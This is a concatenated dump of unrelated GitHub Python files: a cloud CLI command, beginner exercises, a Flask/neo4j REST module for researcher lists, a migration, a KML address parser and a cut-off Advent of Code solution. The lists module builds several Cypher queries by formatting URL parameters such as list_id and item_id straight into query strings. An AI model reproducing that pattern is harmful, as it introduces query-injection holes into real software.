command\n\nfrom otcextensions.i18n import _\n\nLOG = logging.getLogger(__name__)\n\n\nclass ListStatistic(command.Lister):\n _description = _('List DCS Statistics')\n columns = ('instance_id', 'max_memory', 'used_memory',\n 'cmd_get_count', 'cmd_set_count', 'used_cpu',\n 'input_kbps', 'output_kbps')\n\n def get_parser(self, prog_name):\n parser = super(ListStatistic, self).get_parser(prog_name)\n return parser\n\n def take_action(self, parsed_args):\n client = self.app.client_manager.dcs\n\n data = client.statistics()\n\n table = (self.columns,\n (utils.get_item_properties(\n s, self.columns,\n ) for s in data))\n return table\n","repo_name":"opentelekomcloud/python-otcextensions","sub_path":"otcextensions/osclient/dcs/v1/statistic.py","file_name":"statistic.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"95"} +{"seq_id":"1526768564","text":"ebrima = [['Gambia', 1992, 'March', 5], ['Oxford', 2010, 'April', 19], ['Lagos', 2015, 'January', 20], ['Stockholm', 2020, 'June', 1]]\n# write a program that going to return the year I traveled to Lagos from the list above\n# print(ebrima[2][1])\n\n# user_input = input('Enter Year of travel: ')\n# if user_input == 2015:\n# print(f'ebrima have travel to {ebrima:2}')\n\n\nalieu = [9, 1, 25, 9, 18, 89, 0, 35]\n# write a program that is going to change the ordering of the above list in decending order\n\n# print(sorted(alieu, reverse=True))\n\n# print(alieu.sort())\n# Given the list, words, of strings below, filter out the palindromes and append to the initial empty list, pal\n\nwords = ['the', 'bib', 'mom', 'table', 'radar']\npal = []\n\ndef isPal(word):\n if word == word[::-1]:\n pal.append(word)\n\n\nfor word in words:\n isPal(word)\n\nprint(pal)\n\n\n\n\n","repo_name":"siseebrima/ebroDev","sub_path":"bini.py","file_name":"bini.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"38337452172","text":"\"\"\"\nManage the lists of the researcher\n\"\"\"\nimport re\nfrom typing import Dict, Optional\n\nfrom imc.endpoints import IMCEndpoint\nfrom imc.models import Target\nfrom restapi import decorators\nfrom restapi.config import get_backend_url\nfrom restapi.connectors import neo4j\nfrom restapi.exceptions import BadRequest, Conflict, Forbidden, NotFound\nfrom restapi.models import fields\nfrom restapi.rest.definition import Response\nfrom restapi.services.authentication import User\nfrom restapi.utilities.logs import log\n\nTARGET_PATTERN = re.compile(\"(item|shot):([a-z0-9-])+\")\n\n__author__ = \"Giuseppe Trotta (g.trotta@cineca.it)\"\n\n\nclass List(IMCEndpoint):\n labels = [\"list\"]\n\n @decorators.auth.require_all(\"Researcher\")\n @decorators.use_kwargs(\n {\n \"r_uuid\": fields.Str(\n required=False,\n data_key=\"researcher\",\n metadata={\"description\": \"Researcher uuid\"},\n ),\n \"belong_item\": fields.Str(\n required=False,\n data_key=\"item\",\n metadata={\n \"description\": \"Item uuid (used to check whether the item belongs to the list or not)\"\n },\n ),\n \"nb_items\": fields.Bool(\n required=False,\n load_default=False,\n data_key=\"includeNumberOfItems\",\n ),\n },\n location=\"query\",\n )\n @decorators.endpoint(\n path=\"/lists/\",\n summary=\"Get a list of the researcher\",\n description=\"Returns all the list of a researcher.\",\n responses={\n 200: \"The list of the researcher.\",\n 403: \"The user is not authorized to perform this operation.\",\n 404: \"The requested list does not exist.\",\n },\n )\n def get(\n self,\n list_id: str,\n user: User,\n r_uuid: Optional[str] = None,\n belong_item: Optional[str] = None,\n nb_items: bool = False,\n ) -> Response:\n \"\"\"Get a certain list for given id.\"\"\"\n graph = neo4j.get_instance()\n i_am_admin = self.auth.is_admin(user)\n researcher = user if not i_am_admin else None\n if i_am_admin and r_uuid is not None:\n researcher = graph.User.nodes.get_or_none(uuid=r_uuid)\n if not researcher:\n log.debug(\"Researcher with uuid {} does not exist\", r_uuid)\n raise NotFound(\"Please specify a valid researcher id\")\n\n res = graph.List.nodes.get_or_none(uuid=list_id)\n if not res:\n log.debug(\"List with uuid {} does not exist\", list_id)\n raise NotFound(\"Please specify a valid list id\")\n\n creator = res.creator.single()\n if not i_am_admin and researcher.uuid != creator.uuid:\n raise Forbidden(\n \"You are not allowed to get a list that does not belong to you\",\n )\n user_list = self.getJsonResponse(res)\n if i_am_admin and researcher is None:\n user_list[\"creator\"] = {\n \"uuid\": creator.uuid,\n \"name\": creator.name,\n \"surname\": creator.surname,\n }\n\n if belong_item is not None:\n found = False\n for i in res.items.all():\n if i.downcast().uuid == belong_item:\n found = True\n break\n user_list[\"belong\"] = found\n\n if nb_items:\n user_list[\"nb_frames\"] = len(res.items)\n\n return self.response(user_list)\n\n\nclass Lists(IMCEndpoint):\n labels = [\"list\"]\n\n @decorators.auth.require_all(\"Researcher\")\n @decorators.use_kwargs(\n {\n \"r_uuid\": fields.Str(\n required=False,\n data_key=\"researcher\",\n metadata={\"description\": \"Researcher uuid\"},\n ),\n \"belong_item\": fields.Str(\n required=False,\n data_key=\"item\",\n metadata={\n \"description\": \"Item uuid (used to check whether the item belongs to the list or not)\"\n },\n ),\n \"nb_items\": fields.Bool(\n required=False,\n load_default=False,\n data_key=\"includeNumberOfItems\",\n ),\n },\n location=\"query\",\n )\n @decorators.endpoint(\n path=\"/lists\",\n summary=\"Get a list of the researcher\",\n description=\"Returns all the list of a researcher.\",\n responses={\n 200: \"The list of the researcher.\",\n 403: \"The user is not authorized to perform this operation.\",\n 404: \"The requested list does not exist.\",\n },\n )\n def get(\n self,\n user: User,\n r_uuid: Optional[str] = None,\n belong_item: Optional[str] = None,\n nb_items: bool = False,\n ) -> Response:\n \"\"\"Get all the list of a user.\"\"\"\n graph = neo4j.get_instance()\n\n i_am_admin = self.auth.is_admin(user)\n researcher = self.get_user() if not i_am_admin else None\n if i_am_admin and r_uuid is not None:\n researcher = graph.User.nodes.get_or_none(uuid=r_uuid)\n if not researcher:\n log.debug(\"Researcher with uuid {} does not exist\", r_uuid)\n raise NotFound(\"Please specify a valid researcher id\")\n\n user_match = \"\"\n optional_match = \"\"\n if researcher:\n user_match = (\n \"MATCH (n)-[:LST_BELONGS_TO]->(:User {{uuid:'{user}'}})\".format(\n user=researcher.uuid\n )\n )\n log.debug(\"researcher: {} {}\", researcher.name, researcher.surname)\n\n if nb_items:\n optional_match = \"OPTIONAL MATCH (n)-[r:LST_ITEM]->(:ListItem)\"\n\n count_items = \", count(r)\" if nb_items else \"\"\n query = (\n \"MATCH (n:List) \"\n \"{match} \"\n \"{optional} \"\n \"RETURN DISTINCT(n){counter}\".format(\n match=user_match, optional=optional_match, counter=count_items\n )\n )\n log.debug(\"query: {}\", query)\n\n # get total number of lists\n # numels = [row[0] for row in graph.cypher(count)][0]\n # log.debug(\"Total number of lists: {0}\", numels)\n\n data = []\n # meta_response = {\"totalItems\": numels}\n results = graph.cypher(query)\n # for res in [graph.List.inflate(row[0]) for row in results]:\n for row in results:\n res = graph.List.inflate(row[0])\n user_list = self.getJsonResponse(res)\n if i_am_admin and researcher is None:\n creator = res.creator.single()\n user_list[\"creator\"] = {\n \"uuid\": creator.uuid,\n \"name\": creator.name,\n \"surname\": creator.surname,\n }\n if belong_item is not None:\n for i in res.items.all():\n if i.downcast().uuid == belong_item:\n user_list[\"belong\"] = True\n break\n if nb_items:\n user_list[\"nb_items\"] = row[1]\n data.append(user_list)\n\n # return self.response(data, meta=meta_response)\n return self.response(data)\n\n @decorators.auth.require_all(\"Researcher\")\n @decorators.database_transaction\n @decorators.use_kwargs(\n {\"name\": fields.Str(required=True), \"description\": fields.Str(required=True)}\n )\n @decorators.endpoint(\n path=\"/lists\",\n summary=\"Create a new list\",\n responses={\n 201: \"List created successfully.\",\n 400: \"There is no content present in the request body or the content is not valid for list.\",\n 403: \"The user is not authorized to perform this operation.\",\n 409: \"There is already a list with that name.\",\n },\n )\n def post(self, name: str, description: str, user: User) -> Response:\n \"\"\"\n Create a new list.\n\n Only a researcher can create a list. Both name and description are\n mandatory. There can not be lists with the same name.\n \"\"\"\n log.debug(\"create a new list\")\n\n graph = neo4j.get_instance()\n\n # check if there is already a list with the same name belonging to the user.\n results = graph.cypher(\n \"MATCH (l:List)-[:LST_BELONGS_TO]-(:User {{uuid:'{user}'}})\"\n \" WHERE l.name =~ '(?i){name}' return l\".format(\n user=user.uuid, name=graph.sanitize_input(name)\n )\n )\n duplicate = [graph.List.inflate(row[0]) for row in results]\n if duplicate:\n raise Conflict(\n \"There is already a list with the same name belonging to you\"\n )\n\n created_list = graph.List(name=name, description=description).save()\n # connect the creator\n created_list.creator.connect(user)\n log.debug(\"List created successfully. UUID {}\", created_list.uuid)\n return self.response(self.getJsonResponse(created_list), code=201)\n\n @decorators.auth.require_all(\"Researcher\")\n @decorators.database_transaction\n @decorators.use_kwargs(\n {\"name\": fields.Str(required=True), \"description\": fields.Str(required=True)}\n )\n @decorators.endpoint(\n path=\"/lists/\",\n summary=\"Update a list\",\n description=\"Update a list of the researcher\",\n responses={\n 200: \"List updated successfully.\",\n 400: \"There is no content in the request body or the content is not valid\",\n 403: \"The user is not authorized to perform this operation.\",\n 404: \"List does not exist.\",\n 409: \"There is already another list with the same name among your lists.\",\n },\n )\n def put(self, list_id: str, name: str, description: str, user: User) -> Response:\n \"\"\"Update a list.\"\"\"\n log.debug(\"Update list with uuid: {}\", list_id)\n graph = neo4j.get_instance()\n user_list = graph.List.nodes.get_or_none(uuid=list_id)\n if not user_list:\n log.debug(\"List with uuid {} does not exist\", list_id)\n raise NotFound(\"Please specify a valid list id\")\n\n creator = user_list.creator.single()\n if not user or user.uuid != creator.uuid:\n raise Forbidden(\n \"You cannot update an user list that does not belong to you\"\n )\n\n # cannot update a list name if that name is already used for another list\n results = graph.cypher(\n \"MATCH (l:List) WHERE l.uuid <> '{uuid}'\"\n \" MATCH (l)-[:LST_BELONGS_TO]-(:User {{uuid:'{user}'}})\"\n \" WHERE l.name =~ '(?i){name}' return l\".format(\n uuid=list_id,\n user=user.uuid,\n name=graph.sanitize_input(name),\n )\n )\n duplicate = [graph.List.inflate(row[0]) for row in results]\n if duplicate:\n raise Conflict(f\"You already have a list with this name: {name}\")\n # update the list\n user_list.name = name.strip()\n user_list.description = description.strip()\n updated_list = user_list.save()\n log.debug(\"List successfully updated. UUID {}\", updated_list.uuid)\n return self.response(self.getJsonResponse(updated_list))\n\n @decorators.auth.require_all(\"Researcher\")\n @decorators.database_transaction\n @decorators.endpoint(\n path=\"/lists/\",\n summary=\"Delete a list\",\n description=\"Delete a list of the researcher.\",\n responses={\n 204: \"List deleted successfully.\",\n 403: \"The user is not authorized to perform this operation.\",\n 404: \"List does not exist.\",\n },\n )\n def delete(self, list_id: str, user: User) -> Response:\n \"\"\"Delete a list.\"\"\"\n log.debug(\"delete list {}\", list_id)\n\n graph = neo4j.get_instance()\n user_list = graph.List.nodes.get_or_none(uuid=list_id)\n if not user_list:\n log.debug(\"List with uuid {} does not exist\", list_id)\n raise NotFound(\"Please specify a valid list id\")\n\n log.debug(\"current user: {} - {}\", user.email, user.uuid)\n i_am_admin = self.auth.is_admin(user)\n log.debug(\"current user is admin? {0}\", i_am_admin)\n\n creator = user_list.creator.single()\n if user.uuid != creator.uuid and not i_am_admin:\n raise Forbidden(\n \"You cannot delete an user list that does not belong to you\"\n )\n\n # delete the list\n user_list.delete()\n log.debug(\"List delete successfully. UUID {}\", list_id)\n return self.empty_response()\n\n\nclass ListItemAbstract(IMCEndpoint):\n def __init__(self):\n IMCEndpoint.__init__(self)\n self.graph = neo4j.get_instance()\n\n def get_list_item_response(self, list_item):\n # look at the most derivative class\n # expected list_item of type :Item or :Shot\n mdo = list_item.downcast()\n item = None\n if isinstance(mdo, self.graph.Item):\n item = mdo\n elif isinstance(mdo, self.graph.Shot):\n item = mdo.item.single()\n else:\n raise ValueError(\"Invalid ListItem instance.\")\n creation = item.creation.single()\n if creation is None:\n raise ValueError(f\"Very strange. Item <{item.uuid}> with no metadata\")\n creation = creation.downcast()\n\n res = self.getJsonResponse(mdo, max_relationship_depth=0)\n api_url = get_backend_url()\n res[\"links\"] = {}\n if isinstance(mdo, self.graph.Item):\n # always consider v2 properties if exists\n v2 = item.other_version.single()\n content_type = f\"{item.item_type.split('-')[-1].lower()}s\"\n res[\"links\"][\n \"content\"\n ] = f\"{api_url}/api/{content_type}/{creation.uuid}/content?type={content_type[:-1]}\"\n res[\"links\"][\"thumbnail\"] = (\n f\"{api_url}/api/{content_type}/{creation.uuid}/content?type=thumbnail&size=large\"\n if item.item_type == \"Video\" or v2 is None\n else f\"{api_url}/api/{content_type}/{creation.uuid}/content?type={content_type[:-1]}\"\n )\n else:\n # SHOT\n res[\"links\"][\n \"content\"\n ] = f\"{api_url}/api/videos/{creation.uuid}/content?type=video\"\n # THIS IS WRONG. SHOULD BE get_frontend_url\n res[\"links\"][\"webpage\"] = f\"{api_url}/app/catalog/videos/{creation.uuid}\"\n res[\"links\"][\n \"thumbnail\"\n ] = f\"{api_url}/api/shots/{mdo.uuid}?content=thumbnail\"\n # add some video item attributes\n res[\"item\"] = {\n \"digital_format\": item.digital_format,\n \"dimension\": item.dimension,\n \"duration\": item.duration,\n \"framerate\": item.framerate,\n }\n\n res[\"creation_id\"] = creation.uuid\n res[\"rights_status\"] = creation.get_rights_status_display()\n for record_source in creation.record_sources.all():\n provider = record_source.provider.single()\n res[\"city\"] = provider.city\n break\n # add title\n for idx, t in enumerate(creation.titles.all()):\n # get default\n if not idx:\n res[\"title\"] = t.text\n # override with english text\n if t.language and t.language == \"en\":\n res[\"title\"] = t.text\n # add description\n for idx, desc in enumerate(creation.descriptions.all()):\n # get default\n if not idx:\n res[\"description\"] = desc.text\n # override with english text\n if desc.language and desc.language == \"en\":\n res[\"description\"] = desc.text\n # add contributor\n for agent in creation.contributors.all():\n rel = creation.contributors.relationship(agent)\n if (\n item.item_type == \"Video\"\n and agent.names\n and \"Director\" in rel.activities\n ):\n # expected one in the list\n res[\"director\"] = agent.names[0]\n break\n if (\n item.item_type == \"Image\"\n and agent.names\n and \"Creator\" in rel.activities\n ):\n # expected one in the list\n res[\"creator\"] = agent.names[0]\n break\n # add production year\n if item.item_type == \"Image\" and creation.date_created:\n res[\"production_year\"] = creation.date_created[0]\n if item.item_type == \"Video\" and creation.production_years:\n res[\"production_year\"] = creation.production_years[0]\n # add video format\n if item.item_type == \"Video\":\n video_format = creation.video_format.single()\n if video_format is not None:\n res[\"video_format\"] = self.getJsonResponse(\n video_format, max_relationship_depth=0\n )\n # add spatial coverage\n res[\"spatial_coverages\"] = []\n for spatial_coverage in creation.spatial_coverages.all():\n res[\"spatial_coverages\"].append(\n {\"value\": spatial_coverage.value, \"type\": spatial_coverage.spatial_type}\n )\n if len(res[\"spatial_coverages\"]) == 0:\n del res[\"spatial_coverages\"]\n # add temporal coverage\n res[\"temporal_coverages\"] = []\n for temporal_coverage in creation.temporal_coverages.all():\n res[\"temporal_coverages\"].append(temporal_coverage.value)\n if len(res[\"temporal_coverages\"]) == 0:\n del res[\"temporal_coverages\"]\n # add notes and links\n res[\"annotations\"] = {}\n notes = mdo.annotation.search(annotation_type=\"DSC\", private=False)\n if notes:\n res[\"annotations\"][\"notes\"] = []\n for n in notes:\n # expected single body here\n note_text = n.bodies.single().downcast()\n res[\"annotations\"][\"notes\"].append(\n {\"text\": note_text.value, \"language\": note_text.language}\n )\n links = mdo.annotation.search(annotation_type=\"LNK\", private=False)\n if links:\n res[\"annotations\"][\"links\"] = []\n for link in links:\n link_text = link.bodies.single().downcast()\n # a link can have a ReferenceBody\n if not isinstance(link_text, self.graph.TextualBody):\n continue\n res[\"annotations\"][\"links\"].append(link_text.value)\n if not res[\"annotations\"][\"links\"]:\n del res[\"annotations\"][\"links\"]\n if not res[\"annotations\"]:\n del res[\"annotations\"]\n return res\n\n def check_user_list(self, user, list_id):\n try:\n user_list = self.graph.List.nodes.get(uuid=list_id)\n except self.graph.List.DoesNotExist:\n log.debug(\"List with uuid {} does not exist\", list_id)\n raise NotFound(\"Please specify a valid list id\")\n # am I the owner of the list? (allowed also to admin)\n i_am_admin = self.auth.is_admin(user)\n creator = user_list.creator.single()\n if user.uuid != creator.uuid and not i_am_admin:\n raise Forbidden(\n \"You are not allowed to get a list that does not belong to you\",\n )\n return user_list\n\n\nclass ListItem(ListItemAbstract):\n \"\"\"Item in a user list.\"\"\"\n\n labels = [\"list item\"]\n\n @decorators.auth.require_all(\"Researcher\")\n @decorators.endpoint(\n path=\"/lists//items/\",\n summary=\"List of items in a list.\",\n description=\"Get all the items of a list. the result supports paging.\",\n responses={\n 200: \"An list of items.\",\n 403: \"The user is not authorized to perform this operation.\",\n 404: \"List does not exist.\",\n },\n )\n def get(self, list_id: str, item_id: str, user: User) -> Response:\n \"\"\"Get a certain item of a user list\"\"\"\n user_list = self.check_user_list(user, list_id)\n log.debug(\n \"Get item <{}> of the list <{}, {}>\".format(\n item_id, user_list.uuid, user_list.name\n )\n )\n # Find item with uuid in the user_list\n # res = user_list.items.search(uuid=item_id)\n results = self.graph.cypher(\n \"MATCH (l:List {{uuid:'{uuid}'}})\"\n \" MATCH (l)-[:LST_ITEM]->(i:ListItem {{uuid:'{item}'}})\"\n \" RETURN i\"\n \"\".format(uuid=list_id, item=item_id)\n )\n res = [self.graph.ListItem.inflate(row[0]) for row in results]\n if not res:\n raise NotFound(\n \"Item <{}> is not connected to the list <{}, {}>\".format(\n item_id, user_list.uuid, user_list.name\n )\n )\n return self.response(self.get_list_item_response(res[0]))\n\n\nclass ListItems(ListItemAbstract):\n \"\"\"List of items in a list.\"\"\"\n\n labels = [\"list of items\"]\n\n @decorators.auth.require_all(\"Researcher\")\n @decorators.endpoint(\n path=\"/lists//items\",\n summary=\"List of items in a list.\",\n description=\"Get all the items of a list. the result supports paging.\",\n responses={\n 200: \"An list of items.\",\n 403: \"The user is not authorized to perform this operation.\",\n 404: \"List does not exist.\",\n },\n )\n def get(self, list_id: str, user: User) -> Response:\n \"\"\"Get all the items of a user list\"\"\"\n user_list = self.check_user_list(user, list_id)\n log.debug(\n \"Get all the items of the list <{}, {}>\", user_list.uuid, user_list.name\n )\n\n data = []\n for list_item in user_list.items.all():\n data.append(self.get_list_item_response(list_item))\n return self.response(data)\n\n @decorators.auth.require_all(\"Researcher\")\n @decorators.database_transaction\n @decorators.use_kwargs(Target)\n @decorators.endpoint(\n path=\"/lists//items\",\n summary=\"Add an item to a list.\",\n responses={\n 204: \"Item added successfully.\",\n 400: \"Bad request body or target node does not exist.\",\n 403: \"The user is not authorized to perform this operation.\",\n 404: \"List does not exist.\",\n 409: \"The item is already connected to that list.\",\n },\n )\n def post(\n self, list_id: str, target: Dict[str, Dict[str, str]], user: User\n ) -> Response:\n \"\"\"Add an item to a list.\"\"\"\n log.debug(\"Add an item to list {} with target {}\", list_id, target)\n\n user_list = self.graph.List.nodes.get_or_none(uuid=list_id)\n if not user_list:\n log.debug(\"List with uuid {} does not exist\", list_id)\n raise NotFound(\"Please specify a valid list id\")\n\n # am I the creator of the list?\n creator = user_list.creator.single()\n if user.uuid != creator.uuid:\n raise Forbidden(\n \"You cannot add an item to a list that does not belong to you\"\n )\n\n target_type = target.get(\"type\")\n target_id = target.get(\"id\")\n\n log.debug(\"target type: {}, target id: {}\", target_type, target_id)\n target_node = None\n if target_type == \"item\":\n target_node = self.graph.Item.nodes.get_or_none(uuid=target_id)\n elif target_type == \"shot\":\n target_node = self.graph.Shot.nodes.get_or_none(uuid=target_id)\n\n if target_node is None:\n raise BadRequest(f\"Target [{target_type}:{target_id}] does not exist\")\n # check if the incoming target is already connected to the list\n if target_node.lists.is_connected(user_list):\n raise Conflict(\n f\"The item is already connected to the list {list_id}, {user_list.name}\"\n )\n # connect the target to the list\n user_list.items.connect(target_node)\n log.debug(\n \"Item {} added successfully to list <{}, {}>\",\n target,\n list_id,\n user_list.name,\n )\n # 204: return empty response (?)\n return self.empty_response()\n\n @decorators.auth.require_all(\"Researcher\")\n @decorators.database_transaction\n @decorators.endpoint(\n path=\"/lists//items/\",\n summary=\"Delete an item from a list.\",\n responses={\n 204: \"Item deleted successfully.\",\n 403: \"The user is not authorized to perform this operation.\",\n 404: \"List or item does not exist.\",\n },\n )\n def delete(self, list_id: str, item_id: str, user: User) -> Response:\n \"\"\"Delete an item from a list.\"\"\"\n user_list = self.graph.List.nodes.get_or_none(uuid=list_id)\n if not user_list:\n log.debug(\"List with uuid {} does not exist\", list_id)\n raise NotFound(\"Please specify a valid list id\")\n\n log.debug(\n \"delete item <{}> from the list <{}, {}>\",\n item_id,\n user_list.uuid,\n user_list.name,\n )\n # am I the creator of the list? (always allowed to admin)\n i_am_admin = self.auth.is_admin(user)\n creator = user_list.creator.single()\n if user.uuid != creator.uuid and not i_am_admin:\n raise Forbidden(\n \"You are not allowed to delete from a list that does not belong to you\",\n )\n\n matched_item = None\n for list_item in user_list.items.all():\n item = list_item.downcast()\n if item.uuid == item_id:\n matched_item = item\n break\n\n if matched_item is None:\n list_info = f\"{user_list.uuid}, {user_list.name}\"\n raise NotFound(f\"Item <{item_id}> does not belong the list {list_info}\")\n\n # disconnect the item\n user_list.items.disconnect(matched_item)\n log.debug(\n \"Item <{}> remeved from the list <{}, {}>successfully.\",\n item_id,\n user_list.uuid,\n user_list.name,\n )\n return self.empty_response()\n","repo_name":"mdantonio-c/imediacities","sub_path":"projects/imc/backend/endpoints/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":26442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"5037393407","text":"import random\nfrom operator import attrgetter, iadd\n\nfrom tests.factories import *\n\n\ndef test():\n o = FacOrdonnance()\n l = random.choices((FacMedicament, FacConseil), k=10)\n e = [i(ordonnance=o) for i in l]\n random.shuffle(e)\n for i, x in zip(e, range(10)):\n i.position = x\n f = \"id : {} position : {} \"\n return e\n\n print('----------départ---------------')\n for i in e:\n print(f.format(i.id, i.position, i.__str__()))\n\n print('----------cherche index')\n index = 0\n rid = e[3].id #id recherché\n for i, x in zip(e, range(len(e))):\n if i.id == rid:\n index = x\n print(\"id \" + str(rid) + \"à l'index : \" + str(index))\n\n print('-------- + 1 après new pose prévu-----------------')\n np = 6\n for i in e[6:]:\n i.position += 1\n\n for i in e:\n print(f.format(i.id, i.position, i.__str__()))\n print('----------moins index 3---------------------')\n item = e.pop(index)\n item.position = np\n for i in e:\n print(f.format(i.id, i.position, i.__str__()))\n print(\"item : \", item.id, item.position, item.__str__())\n print('--------on ajoute à np-----------')\n for i in e:\n print(f.format(i.id, i.position, i.__str__()))\n return e\n\n\n\"\"\"\nnp en index\nap en index\n\nsi ap > np\n list[np].position +=1\nsi ap < np\n\n\"\"\"\n\n\ndef change_pos(e, ap, np):\n import copy\n a = copy.deepcopy(e)\n \"\"\"\n réaffectation des rangs selon la position dans la liste :\n 2 cas particuliers :\n - ap et np se suivent donc simple interversion\n - np en dernière position\n \"\"\"\n\n if abs(np - ap) == 1:\n #1 rang de diféreence donc on échange juste\n a[ap].position = np\n a[np].position = ap\n\n elif ap > np:\n if np == len(a) - 1:\n #dernière position donc met un pos max pour le classement\n a[ap].position = len(a)\n else:\n a[ap].position = np\n a[np].position += 1\n elif ap < np:\n a[ap].position = np\n\n else:\n return copy.deepcopy(a)\n a.sort(key=attrgetter('position'))\n for i, x in zip(a, range(10)):\n i.position = x\n return copy.deepcopy(a)\n","repo_name":"jgirardet/unolog","sub_path":"sandbox.py","file_name":"sandbox.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"21636288503","text":"\"\"\"empty message\n\nRevision ID: 4d906cd9a206\nRevises: 4f91f8e6df1a\nCreate Date: 2019-12-10 23:36:46.967859\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '4d906cd9a206'\ndown_revision = '4f91f8e6df1a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('users', sa.Column('default_target_id', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'users', 'connectors', ['default_target_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'users', type_='foreignkey')\n op.drop_column('users', 'default_target_id')\n # ### end Alembic commands ###\n","repo_name":"ventor-tech/time-sync","sub_path":"migrations/versions/4d906cd9a206_.py","file_name":"4d906cd9a206_.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"73817401591","text":"from django import template\nfrom rdrf.models.definition.models import Registry\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef site_info():\n \"\"\"\n Provide info about which registry is installed\n Only makes sense when one and only one installed\n \"\"\"\n try:\n registry_model = Registry.objects.get()\n return registry_model.version\n except Registry.MultipleObjectsReturned:\n return \"\"\n except Registry.DoesNotExist:\n return \"\"\n","repo_name":"muccg/rdrf","sub_path":"rdrf/rdrf/templatetags/site_info.py","file_name":"site_info.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"95"} +{"seq_id":"22843331987","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 19 08:29:38 2020\r\n\r\n@author: JosephKuchar\r\n\r\nThis script processes the address file from the Saskatoon open data portal\r\n(http://opendata-saskatoon.cloudapp.net/DataBrowser/SaskatoonOpenDataCatalogueBeta/ParcelAddress#param=NOFILTER--DataView--Results)\r\nit's a kml file with embedded html, so this parses different parts of the file\r\nusing either html or xml parsing\r\n\"\"\"\r\nimport pandas as pd\r\nfrom bs4 import BeautifulSoup as Soup\r\n\r\nwith open(\"Saskatoon/ParcelAddress.kml\") as data:\r\n kml_soup = Soup(data, 'lxml-xml') # Parse as XML\r\nNUMBER=[]\r\nADDRESS=[]\r\ndescriptions = kml_soup.find_all('description')[1:]\r\nfor description in descriptions:\r\n html_soup = Soup(description.text, 'lxml') # Parse as HTML\r\n \r\n num=html_soup.find(\"td\",string='STREET_NUMBER').find_next(\"td\").get_text()\r\n add=html_soup.find(\"td\",string='ONLINE_ADDRESS').find_next(\"td\").get_text()\r\n ADDRESS.append(add)\r\n NUMBER.append(num)\r\n\r\n\r\nLON=[]\r\nLAT=[]\r\n\r\npoints = kml_soup.find_all('coordinates')\r\nfor point in points:\r\n xy=point.get_text().split(',')\r\n \r\n LON.append(xy[0])\r\n LAT.append(xy[1])\r\n\r\nSTREET=ADDRESS.copy()\r\n\r\nfor i in range(len(STREET)):\r\n STREET[i]=STREET[i].strip(NUMBER[i]).strip()\r\n STREET[i]=STREET[i].rstrip(', Saskatoon, SK CA')\r\n\r\ndict={'NUMBER':NUMBER, 'STREET':STREET,'ADDRESS':ADDRESS,'LON':LON,'LAT':LAT}\r\n\r\ndf=pd.DataFrame(dict)\r\ndf.to_csv('Saskatoon.csv',index=False)\r\n","repo_name":"CSBP-CPSE/LODE-ECDO","sub_path":"scripts/Addresses/process_saskatoon.py","file_name":"process_saskatoon.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"95"} +{"seq_id":"17200943874","text":"# --- Day 16: Aunt Sue ---\n\n# Your Aunt Sue has given you a wonderful gift, and you'd like to send her a\n# thank you card. However, there's a small problem: she signed it \"From, Aunt\n# Sue\".\n\n# You have 500 Aunts named \"Sue\".\n\n# So, to avoid sending the card to the wrong person, you need to figure out\n# which Aunt Sue (which you conveniently number 1 to 500, for sanity) gave you\n# the gift. You open the present and, as luck would have it, good ol' Aunt Sue\n# got you a My First Crime Scene Analysis Machine! Just what you wanted. Or\n# needed, as the case may be.\n\n# The My First Crime Scene Analysis Machine (MFCSAM for short) can detect a few\n# specific compounds in a given sample, as well as how many distinct kinds of\n# those compounds there are. According to the instructions, these are what the\n# MFCSAM can detect:\n\n# children, by human DNA age analysis.\n# cats. It doesn't differentiate individual breeds.\n# Several seemingly random breeds of dog: samoyeds, pomeranians, akitas, and vizslas.\n# goldfish. No other kinds of fish.\n# trees, all in one group.\n# cars, presumably by exhaust or gasoline or something.\n# perfumes, which is handy, since many of your Aunts Sue wear a few kinds.\n\n# In fact, many of your Aunts Sue have many of these. You put the wrapping from\n# the gift into the MFCSAM. It beeps inquisitively at you a few times and then\n# prints out a message on ticker tape:\n\n# children: 3\n# cats: 7\n# samoyeds: 2\n# pomeranians: 3\n# akitas: 0\n# vizslas: 0\n# goldfish: 5\n# trees: 3\n# cars: 2\n# perfumes: 1\n\n# You make a list of the things you can remember about each Aunt Sue. Things\n# missing from your list aren't zero - you simply don't remember the value.\n\n# What is the number of the Sue that got you the gift?\n\n# --- Part Two ---\n\n# As you're about to send the thank you note, something in the MFCSAM's\n# instructions catches your eye. Apparently, it has an outdated\n# retroencabulator, and so the output from the machine isn't exact values - some\n# of them indicate ranges.\n\n# In particular, the cats and trees readings indicates that there are greater\n# than that many (due to the unpredictable nuclear decay of cat dander and tree\n# pollen), while the pomeranians and goldfish readings indicate that there are\n# fewer than that many (due to the modial interaction of magnetoreluctance).\n\n# What is the number of the real Aunt Sue?\n\nimport sys\n\ndef main( argv ):\n\n # Read in input file and add up the sums\n with open( \"input/day16-input.txt\", \"r\" ) as f:\n data = f.readlines()\n\n sues = {}\n\n for line in data:\n line = line.strip().split( ':', maxsplit=1 )\n\n sueNum = line[ 0 ].split()[ 1 ]\n attrib = {key.strip(): int( val ) for key, val in [ item.split( ': ' ) for item in line[ 1 ].split( ', ' ) ]}\n sues[ sueNum ] = 